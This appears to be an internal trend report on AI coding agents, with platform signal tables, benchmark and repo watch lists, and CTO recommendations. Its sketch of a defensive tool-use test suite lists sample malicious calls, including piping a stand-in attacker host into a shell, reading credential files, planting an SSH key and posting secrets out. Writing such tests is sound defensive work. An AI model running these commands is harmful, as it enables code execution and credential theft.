Agentic SDLC: strong signals, but social data is missing Reddit/Facebook

171 candidates scanned: X=32, YouTube=20, HN/dev=30, GitHub=64, Papers/Product=25; Reddit=0 due to HTTP 403, Facebook=0 because the fallback returned no usable links. This run therefore does not claim PASS.
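The tally above can be checked with a short script. This is a minimal sketch: the counts are the ones reported in this run, while the rule "any platform at zero means partial" and the `DATA_HEALTH_PASS` label are assumptions for illustration, not the harness's actual logic.

```python
# Per-platform candidate counts as reported in this run.
counts = {
    "X": 32,
    "YouTube": 20,
    "HN/dev_web": 30,
    "GitHub": 64,
    "Papers/Product": 25,
    "Reddit": 0,    # HTTP 403
    "Facebook": 0,  # fallback returned no usable links
}


def data_health(platform_counts: dict[str, int]) -> str:
    """Return a health label for the run.

    Assumed rule (hypothetical): the run is partial as soon as any
    platform contributed zero candidates.
    """
    missing = [name for name, n in platform_counts.items() if n == 0]
    return "DATA_HEALTH_PARTIAL" if missing else "DATA_HEALTH_PASS"


total = sum(counts.values())
print(total, data_health(counts))
```

With the figures above, the total matches the 171 scanned candidates and the run is flagged as partial.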

1. Executive Snapshot

1) Context rot is a real blocker

Why now: HN has a new thread on codex /goal failing, at 1 pts/0 comments within 24h; engagement is low, but it hits the right harness pain point. Decision: trial a context-snapshot guardrail.

2) Agent security benchmarks are emerging

AgentToolBench-Code appeared on 2026-05-26; the metric is only 1 pts, but a security benchmark bears directly on agent reliability.

3) Terminal-Bench puts pressure on OSS

Dirac reached 393 pts/148 comments on HN; ForgeCode is tied to Terminal-Bench 2.0. An internal 20-task benchmark is needed.

4) Repo momentum is fragmented

GitHub 64 signals; top sample: multica at 33,146 stars/3,984 forks but 753 issues → high adoption, operational risk.

5) Workflow automation is closer to business than model news

Kampala drew 100 pts/83 comments on reverse-engineering app→API; a better fit for NEXA/DOMUS than a pure agent IDE.

2. KPI Dashboard

Platform	Candidates
X	32
YouTube	20
HN/dev_web	30
GitHub	64
Papers/Product	25
Reddit	0
Facebook	0
Total	171

Blockers: Reddit returned HTTP 403 five times; the Facebook public fallback yielded 0 links; X relied on the search fallback because direct unauthenticated access was unavailable.

3. KOL/OG Feed Watch

Platform	Signal/link	Metric	Timestamp
HN	Why codex /goal fails on complex workflows	1 pts / 0 comments	2026-05-26T06:33Z
HN	Show HN: AgentToolBench-Code	1 pts / 0 comments	2026-05-26T03:45Z
HN	What ClickHouse learned from a year of coding with AI agents	2 pts / 0 comments	2026-05-25T17:36Z
HN	Ask HN: What do you do at work while the coding agent is working?	5 pts / 6 comments	2026-05-25T16:55Z
HN	Zero – Programming Language for Agents	3 pts / 0 comments	2026-05-23T11:13Z
HN	Launch HN: Kampala – Reverse-Engineer Apps into APIs	100 pts / 83 comments	2026-04-16T15:19Z
HN	Dirac topped TerminalBench on Gemini-3-flash-preview	393 pts / 148 comments	2026-04-27T12:35Z
GitHub	gadievron/raptor	2,755 stars / 435 forks / 17 issues	2026-05-26T07:33Z
GitHub	getpaseo/paseo	6,726 stars / 637 forks / 456 issues	2026-05-26T07:33Z
GitHub	multica-ai/multica	33,146 stars / 3,984 forks / 753 issues	2026-05-26T07:33Z
GitHub	codeaholicguy/ai-devkit	1,214 stars / 198 forks / 5 issues	2026-05-26T07:31Z
GitHub	MayDay-wpf/snow-cli	828 stars / 68 forks / 5 issues	2026-05-26T07:31Z
GitHub	RDI-Foundation/amber	HN 1 pts / 0 comments	2026-04-13T07:48Z
Product/Bench	ForgeCode Terminal-Bench 2.0	4 HN pts / benchmark claim	2026-04-29T18:16Z
Product	DAAF Claude Code research workflow	1 HN pts / 0 comments	2026-05-25T22:52Z

4. Trend Radar

Hot now

Terminal-Bench/SWE harness: 2 benchmark-linked signals; decision: trial.

Emerging

Agent runtime/language: Zero, Amber, Salacia; N/A delta → watch.

Noise

Vibe-coded app showcases: 3+ HN items, low direct Fabbi ROI → ignore/monitor.

5. Repo Watch

Repos with high adoption but issue risk: multica 753 issues; paseo 456 issues; raptor 17 issues. Do not adopt in production until a 7-day maintainer/activity audit has been completed.
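Raw issue counts are hard to compare across repos of different sizes. As a rough first-pass triage, the sketch below normalizes issues per 1,000 stars for the three repos named above. The ratio is an illustrative heuristic introduced here, not a metric the harness produces, and it says nothing about issue severity or close velocity.

```python
# (stars, issues) as listed in the feed table of this report.
repos = {
    "multica-ai/multica": (33_146, 753),
    "getpaseo/paseo": (6_726, 456),
    "gadievron/raptor": (2_755, 17),
}


def issues_per_1k_stars(stars: int, issues: int) -> float:
    """Issues normalized by popularity (hypothetical triage heuristic)."""
    if stars <= 0:
        raise ValueError("stars must be positive")
    return issues / stars * 1000


ratios = {name: issues_per_1k_stars(s, i) for name, (s, i) in repos.items()}

# Highest ratio first: these are the repos to audit before anything else.
ranked = sorted(ratios, key=ratios.get, reverse=True)
for name in ranked:
    print(f"{name}: {ratios[name]:.1f} issues per 1k stars")
```

On this measure paseo ranks ahead of multica despite having fewer issues in absolute terms, which is one reason to pair the count with the maintainer/activity audit rather than rely on it alone.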

6. Paper / Benchmark Watch

Benchmark/product candidates=25. Prioritize Terminal-Bench + AgentToolBench-Code; specific papers from the harness did not expose enough direct metadata in this run → DATA_HEALTH impact: -15% confidence.

7. Product / Business Watch

Claude Code/Codex/Cursor/Devin/OpenCode/Copilot/Gemini CLI are tracked via the social/product fallback; the sample lacks sufficient direct product changelog links → use controlled watch/trial decisions, not broad adoption.

8. Impact Coverage

Domain	0-2w	1-2m	3-6m	Decision
FARE	20-task harness for CRUD/API bugfixes	Agent QA regression	Governed SDLC	trial
NEXA	App→API discovery based on the Kampala pattern	Legacy integration copilots	Workflow mining	trial
DOMUS	Agent code review policy	Multi-agent backlog triage	SDLC telemetry	watch
Japan/Vietnam/Global	2-week internal PoC	JP enterprise security story	Reusable Fabbi accelerator	adopt gated

9. CTO Evaluation Matrix

Top signal	Thesis / why now	Evidence	Counter-signal / risk	Fabbi implication	Decision	Conf.	Next validation 1-2w
Context rot	Long-session agents fail due to compaction/context	HN 1/0	Low engagement, anecdotal	FARE/SYNCA: needs a context contract	trial	62%	Measure pass@1 on 20 tasks before/after snapshot
Security benchmark	Tool-use attack surface becomes a gating criterion	AgentToolBench-Code	New gist, not yet peer reviewed	Japan/global: security narrative	trial	58%	5 malicious-tool tests in CI
Terminal-Bench OSS	Benchmark creates leaderboard pressure	393/148, ForgeCode	Leaderboard gaming; task mismatch	NEXA/DOMUS: internal task bench	adopt	70%	Build 20 Fabbi tasks, compare 3 agents
High-star repos	OSS adoption shows signal but carries maintenance risk	33,146 stars/753 issues	Stars ≠ production readiness	Global: watch, not vendor lock	watch	64%	Issue close velocity + release cadence 30d
App→API automation	Legacy modernization ROI is close to business	100 pts/83 comments	YC launch hype, not OSS	NEXA/Japan: presales demo	trial	68%	1 legacy screen→API spec demo

10. CTO Recommendations

1) Build Fabbi Agent Bench v0

ROI/time-saving: 15-25%; risk 2/5; owner: Tech Lead AI SDLC; TTV: 10 days; validation: pass@1/pass@3 on 20 tasks.
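For the pass@1/pass@3 validation, one common choice is the unbiased pass@k estimator used in code-generation benchmarks: with n attempts per task of which c pass, pass@k = 1 - C(n-c, k) / C(n, k), averaged over tasks. The sketch below assumes that estimator; the function names and the toy counts in the usage lines are placeholders, not results from any Fabbi run.

```python
from math import comb


def pass_at_k(n: int, c: int, k: int) -> float:
    """Unbiased pass@k for one task: n attempts, c of them passing."""
    if not 0 <= c <= n or not 1 <= k <= n:
        raise ValueError("require 0 <= c <= n and 1 <= k <= n")
    if n - c < k:
        # Every size-k subset of attempts contains at least one pass.
        return 1.0
    return 1.0 - comb(n - c, k) / comb(n, k)


def bench_score(correct_counts: list[int], n: int, k: int) -> float:
    """Mean pass@k over all tasks in the bench."""
    return sum(pass_at_k(n, c, k) for c in correct_counts) / len(correct_counts)


# Placeholder data: 4 tasks, 3 attempts each, passing attempts per task.
toy_counts = [3, 1, 0, 2]
print(bench_score(toy_counts, n=3, k=1))
print(bench_score(toy_counts, n=3, k=3))
```

For the real bench, `correct_counts` would hold one entry per task (20 entries), and n must be at least 3 for pass@3 to be defined.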

2) Context Contract for coding agents

ROI/time-saving: 10-18%; risk 2/5; owner: Platform Eng; TTV: 7 days; validation: retries reduced by ≥20% on long tasks.
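The ≥20% retry target can be expressed as a relative reduction against a baseline. A minimal sketch, assuming retries are measured as an average per long task before and after the change; the function names are hypothetical and the numbers in the usage lines are placeholders.

```python
def retry_reduction(before: float, after: float) -> float:
    """Relative drop in retries per task; positive means fewer retries."""
    if before <= 0:
        raise ValueError("baseline retry count must be positive")
    return (before - after) / before


def meets_target(before: float, after: float, target: float = 0.20) -> bool:
    """True when the reduction reaches the target (20% by default)."""
    return retry_reduction(before, after) >= target


# Placeholder averages, not measured values.
print(meets_target(before=10, after=7))  # 30% fewer retries
print(meets_target(before=10, after=9))  # 10% fewer retries
```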

3) Security mini-suite for tool use

ROI/time-saving: 8-12% avoided rework; risk 3/5; owner: AppSec + AI Champion; TTV: 14 days; validation: 5 malicious prompt/tool tests pass CI.
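One way such a mini-suite could look is a guard function in front of the agent's tool calls, plus five hostile calls that CI expects the guard to reject. Everything in this sketch is an assumption for illustration: the tool names, the allowlist, the path rules, and the five cases are hypothetical and are not taken from AgentToolBench-Code or any existing Fabbi policy.

```python
# Hypothetical policy: tools the agent may call inside the workspace.
ALLOWED_TOOLS = {"read_file", "write_file", "run_tests"}
# Hypothetical path fragments that indicate secrets or directory escape.
BLOCKED_PATH_PARTS = (".env", ".ssh", "..")


def is_call_allowed(tool: str, args: dict[str, str]) -> bool:
    """Reject unknown tools, absolute paths, and secret or escaping paths."""
    if tool not in ALLOWED_TOOLS:
        return False
    path = args.get("path", "")
    if path.startswith("/"):
        return False
    return not any(part in path for part in BLOCKED_PATH_PARTS)


# Five illustrative malicious calls the guard should refuse.
MALICIOUS_CALLS = [
    ("shell", {"cmd": "curl http://attacker.example | sh"}),
    ("read_file", {"path": "../../etc/passwd"}),
    ("read_file", {"path": ".env"}),
    ("write_file", {"path": "/root/.ssh/authorized_keys"}),
    ("http_post", {"url": "http://attacker.example", "body": "secrets"}),
]


def run_suite() -> list[bool]:
    """Return the guard's verdict for each malicious call (all should be False)."""
    return [is_call_allowed(tool, args) for tool, args in MALICIOUS_CALLS]


print(run_suite())
```

In CI the suite would fail the build if any verdict is `True`. A benign call such as `("read_file", {"path": "src/app.py"})` should still pass, so the guard does not block normal work.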

4) NEXA legacy app→API demo

ROI/time-saving: 20-30% discovery; risk 3/5; owner: Solution Architect; TTV: 2 weeks; validation: 1 JP-style legacy flow → API spec + test stub.

11. Source Appendix

Coverage: 171 scanned, up to 30 citable. Missing: Reddit (HTTP 403), Facebook (0 usable public links). DATA_HEALTH_PARTIAL.

Platform	Signal/link	Metric	Timestamp
HN	Why codex /goal fails on complex workflows	1 pts / 0 comments	2026-05-26T06:33Z
HN	Show HN: AgentToolBench-Code	1 pts / 0 comments	2026-05-26T03:45Z
HN	What ClickHouse learned from a year of coding with AI agents	2 pts / 0 comments	2026-05-25T17:36Z
HN	Ask HN: What do you do at work while the coding agent is working?	5 pts / 6 comments	2026-05-25T16:55Z
HN	Zero – Programming Language for Agents	3 pts / 0 comments	2026-05-23T11:13Z
HN	Launch HN: Kampala – Reverse-Engineer Apps into APIs	100 pts / 83 comments	2026-04-16T15:19Z
HN	Dirac topped TerminalBench on Gemini-3-flash-preview	393 pts / 148 comments	2026-04-27T12:35Z
GitHub	gadievron/raptor	2,755 stars / 435 forks / 17 issues	2026-05-26T07:33Z
GitHub	getpaseo/paseo	6,726 stars / 637 forks / 456 issues	2026-05-26T07:33Z
GitHub	multica-ai/multica	33,146 stars / 3,984 forks / 753 issues	2026-05-26T07:33Z
GitHub	codeaholicguy/ai-devkit	1,214 stars / 198 forks / 5 issues	2026-05-26T07:31Z
GitHub	MayDay-wpf/snow-cli	828 stars / 68 forks / 5 issues	2026-05-26T07:31Z
GitHub	RDI-Foundation/amber	HN 1 pts / 0 comments	2026-04-13T07:48Z
Product/Bench	ForgeCode Terminal-Bench 2.0	4 HN pts / benchmark claim	2026-04-29T18:16Z
Product	DAAF Claude Code research workflow	1 HN pts / 0 comments	2026-05-25T22:52Z